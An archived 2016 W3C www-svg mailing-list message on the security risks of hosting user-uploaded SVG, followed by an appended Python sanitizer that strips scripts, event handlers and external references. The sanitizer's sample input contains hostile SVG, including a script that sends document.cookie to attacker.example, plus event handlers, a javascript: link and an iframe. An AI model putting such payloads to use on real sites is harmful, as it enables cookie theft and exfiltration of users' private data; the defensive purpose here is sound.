- From: Amelia Bellamy-Royds <amelia.bellamy.royds@gmail.com>
- Date: Wed, 17 Aug 2016 14:55:45 -0600
- To: www-svg <www-svg@w3.org>, David Dailey <ddailey@zoominternet.net>
- Message-ID: <CAFDDJ7w9OzeweTBak1OC3-T2AJJtHdUtZthJ6wUgEowL6iGoCg@mail.gmail.com>
In a separate thread, David Dailey referenced my last email, saying:

> Now, if as Amelia points out[1], folks can work on convincing places like
> FB, Google Plus, Twitter and Wikipedia that SVG in <img> adds value to
> their platforms – and is safe--, the web will become a richer place. Am I
> correct in concluding from what I read at the links you provided, Amelia,
> that SVG in <img> is, as much as anything on the web, safe right now?
>
> [1] https://lists.w3.org/Archives/Public/www-svg/2016Aug/0030.html

That's an oversimplification. Sorry if I made it seem like a solved problem.

It is true that, while I am viewing the SVG as an embedded image, it is safe, and can't access or modify the rest of the HTML page. Therefore, embedding an SVG as an image in your website is safe if it is hosted on an external domain. This is what Ello does, embedding the SVG images that you host on your own website.

The *risk* is in hosting and serving unknown SVG files from your web domain, if that domain also hosts private content that normally requires authentication to access. Which covers a lot of social media use cases.

User-uploaded SVG files are still a potential security risk, just like user-uploaded HTML or JavaScript, because the file can always be viewed independently, and the security limitations of the image element no longer apply.

For example, if I were to upload an awesome-looking but secretly malicious SVG (that someone had shared with me) to a host service, and then view that hosted SVG in an active tab (because the person who shared it told me that it looks better full-screen), it could run scripts that fetch all my other private images hosted on that service and forward them to a 3rd party server.

An HTTP Content Security Policy directive used by the host server and enforced by my web browser could prevent this.
However, there are still many browsers in use which don't enforce CSP: http://caniuse.com/#feat=contentsecuritypolicy

Host servers could of course strip and sanitize SVG, just like they sanitize HTML comments and other uploaded content (and other images, too, by processing them to remove metadata). For example, they could remove all script tags and event handler attributes, and maybe all external references. But so far there hasn't been enough user demand to convince the larger social media companies to do the same.

~ABR
Received on Wednesday, 17 August 2016 20:56:14 UTC
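The server-side sanitizer sketched in the message above (remove script elements, event-handler attributes and external references before serving a user-uploaded SVG from the host's own origin), written out as an added example. This is illustrative code, not code from the email's author or from any host service; the sample upload, the hostname attacker.example and the function names are constructed for the example. It parses the upload as XML, walks the tree, drops <script> and <foreignObject> elements, every on* attribute, any href/xlink:href that is not a same-document fragment, and style content that uses url()/@import, then re-serializes, so the bytes served are the sanitizer's output rather than the original upload.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Register prefixes so the cleaned tree serializes as ordinary SVG
# (ElementTree would otherwise emit ns0:/ns1: prefixes).
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements removed wholesale, matched by local name in any namespace.
# <script> runs code; <foreignObject> smuggles in arbitrary HTML (iframes, forms, ...).
DROP_ELEMENTS = {"script", "foreignObject"}

# CSS constructs that fetch remote resources or (in old engines) execute code.
ACTIVE_CSS = re.compile(r"url\s*\(|@import|expression\s*\(", re.IGNORECASE)


def _local(name: str) -> str:
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return name.rsplit("}", 1)[-1]


def _attr_is_unsafe(name: str, value: str) -> bool:
    local = _local(name).lower()
    if local.startswith("on"):          # onload, onclick, onbegin, ... (event handlers)
        return True
    if local == "href":                 # covers both href and xlink:href
        # Keep only same-document references such as <use xlink:href="#id"/>.
        # javascript:, http(s):, data: and anything else is dropped (conservative).
        return not value.strip().startswith("#")
    if local == "style" and ACTIVE_CSS.search(value):
        return True
    return False


def _scrub(elem: ET.Element, findings: list) -> None:
    """Depth-first pass that removes unsafe children and attributes in place."""
    for child in list(elem):
        tag = _local(child.tag)
        if tag in DROP_ELEMENTS:
            findings.append(f"removed <{tag}> element")
            elem.remove(child)
        elif tag == "style" and child.text and ACTIVE_CSS.search(child.text):
            findings.append("removed <style> with url()/@import")
            elem.remove(child)
        else:
            _scrub(child, findings)
    for name in list(elem.attrib):
        if _attr_is_unsafe(name, elem.attrib[name]):
            findings.append(f"removed attribute {_local(name)} on <{_local(elem.tag)}>")
            del elem.attrib[name]


def sanitize_svg(svg_text: str):
    """Return (clean_svg, findings). Raises ValueError if the root is not <svg>.

    Note: xml.etree expands internal entities; for real untrusted input parse
    with defusedxml (same API) to avoid entity-expansion denial of service.
    """
    root = ET.fromstring(svg_text)
    if root.tag != f"{{{SVG_NS}}}svg":
        raise ValueError("root element is not an SVG <svg>")
    findings = []
    _scrub(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


# Constructed sample upload: a drawing carrying every trick the message warns about.
UNTRUSTED_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"
     onload="exfiltrate()">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <style>@import url(https://attacker.example/t.css);</style>
  <circle cx="50" cy="50" r="40" fill="red" onclick="exfiltrate()"/>
  <image xlink:href="https://attacker.example/track.png" width="10" height="10"/>
  <use xlink:href="#logo"/>
  <a href="javascript:exfiltrate()"><text x="10" y="20">open me</text></a>
  <foreignObject width="100" height="100">
    <body xmlns="http://www.w3.org/1999/xhtml"><iframe src="https://attacker.example/"/></body>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    cleaned, report = sanitize_svg(UNTRUSTED_SVG)
    for line in report:
        print("-", line)
    print(cleaned)
```

Run against the constructed sample, the circle, the local <use> reference and the link text survive; the script, the @import stylesheet, both event handlers, the remote image, the javascript: link and the foreignObject are reported and removed. Two caveats a deployer would want: this is one layer, not a replacement for serving uploads from a separate origin or sending a restrictive Content-Security-Policy header on the SVG response (for instance default-src 'none' with an allowance for inline styles, which blocks script and outbound fetches in browsers that enforce it), and the allow-list above is deliberately narrow, so legitimate files using data: URIs or remote fonts will lose those references and should be reviewed against your own requirements.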